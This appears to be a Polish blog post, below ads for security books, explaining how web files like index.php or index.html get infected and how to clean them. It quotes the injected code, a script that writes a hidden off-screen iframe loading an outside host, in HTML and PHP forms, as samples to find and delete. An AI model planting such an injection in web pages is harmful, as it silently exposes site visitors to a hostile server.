- Bezpieczeństwo systemu Linux w praktyce. Receptury. Wydanie IICena: 50.05 zł
- Firewall nie powstrzyma prawdziwego smoka, czyli jak zadbać o cyberbe...Cena: 31.85 zł
- Kali Linux. Testy bezpieczeństwa, testy penetracyjne i etyczne hakowa...Cena: 43.55 zł
- Odliczając do dnia zero. Stuxnet, czyli prawdziwa historia cyfrowej b...Cena: 25.93 zł
Często czytam komentarze, że pliki php, html lub inne nie mogą zawierać wirusa. Często widzę wpisy użytkowników żalących sie, że ich program AntyVirusowy, zgłasza zagrożenie, które zawarte jest w plikach tekstowych lub odpowiednich dla stron internetowych.
Otóż, tak, jest to możliwe, aby taki plik zawierał niebezpieczny wpis (przeglądarki internetowe traktują takie wpisy jako ingerencję niebezpiecznych programów) i potrafią zablokować taką stronę do wyświetlania, a programy rezydentujące w systemie jako anty wirusowe, poddadzą plik kwarantannie, a nawet go usuną jeśli nie znajdą w swojej bazie danych odpowiedniego powiązania i nie zidentyfikują zagrożenia.
Zanim napiszę jak łatwo pozbyć się niepożądanego zagrożenia, wyjaśnię pokrótce, w czym problem.
Przede wszystkim nie przechowuj swoich haseł do FTP'ów w klientach typu Windows Commander, Putty, czy innych podobnych. Hasłą w tych programach, są łatwe do wyciągnięcia w razie ataku na twój komputer z sieci. Niby banał, jednak wiele osób zwyczajnie trzyma takie wpisy w różnych programach, naiwnie wierząc, że są one bezpieczne. Nic bardziej mylnego. Nawet przysłowiowe gwiazdki które widzimy wpisując hasło, nie swiadczą o tym, że nie można ich podejżeć. Jeśli kto kolwiek kiedys bawił się różnego typu Trojanami, wie, że za pomocą takich smieci, podejrzeć komuś hasło to nic trudnego.
Wracając do tematu... jak wyleczyć zainfekowany plik HTML, JS czy PHP (odnosi sie do wszystkich plików wykonywalnych dla stron WWW, łącznie z AS i INC), jednak zazwyczaj zakażone są pliki podstawowe, a mianowicie INDEX.PHP lub INDEX.HTML.
Otwórz taki plik w jakimś edytorze tekstowym (nie polecam Notatnika dla Windy, ale to temat na inny artykuł) i szukaj błędu na samym jego końcu. Wykasuj go i zapisz plik ponownie.
Dla plików HTML wpis może mieć następujący wygląd:
<script>document.write('<iframe src=\"http://ahbazen.net/?click=3158703\" width=100 height=100 style=\"position:absolute;top:-10000;left:-10000;\"></iframe>');</script>
Dla plików PHP będzie taki wpis zawarty w deklaracji ECHO, czyli:
echo "<script>document.write('<iframe src=\"http://ahbazen.net/?click=3158703\" width=100 height=100 style=\"position:absolute;top:-10000;left:-10000;\"></iframe>');</script>";
?>
Zdażają się jeszcze innego rodzaju wpisy, często zakodowane kluczem MD5, jednak wyleczenie ich wymaga trochę wiedzy i nie należy ich dokonywać jeśli nie wie się dokładnie jaki wpis należy wykasować. (w razie problemów, służę pomocą... wystarczy skontaktować sie ze mna pod adresem konfeusz(at)eu4.pl lub gg: 62627)
Jeśli taki zainfekowany plik znajdował się wcześniej na jakimś serwerze, bardzo prawdopodobne jest, że strona zostałą zablokowana przez FireFoxa lub Google. Po odpluskwieniu pliku i zapisaniu go ponownie na serwerze, należy ponownie zgłośić stronę do indexowania w Googlach.
Życzę miłej zabawy z problemami, bez nich świat był by nudny. Bartek
Listing